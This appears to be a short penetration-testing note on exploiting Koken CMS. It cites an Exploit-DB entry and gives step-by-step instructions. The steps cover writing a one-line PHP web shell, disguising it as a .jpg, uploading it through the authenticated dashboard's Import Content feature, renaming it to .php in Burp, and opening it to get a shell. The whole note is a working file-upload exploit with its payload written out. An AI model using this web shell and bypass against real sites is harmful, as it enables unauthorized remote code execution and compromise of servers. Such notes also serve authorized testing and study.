# Koken CMS

Need creds to get access to dashboard before triggering exploit\
\
<https://www.exploit-db.com/exploits/48706>\
\
**Steps to exploit:**\
\
\[1] Create a malicious PHP file with this content:\
\
`<?php system($_GET['cmd']);?>`\
\
\[2] Save as "image.php.jpg"\
\
\[3] Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.\
\
\[4] On Burp, rename your file to "image.php"

\[5] Click on imported file to trigger revshell\ <br>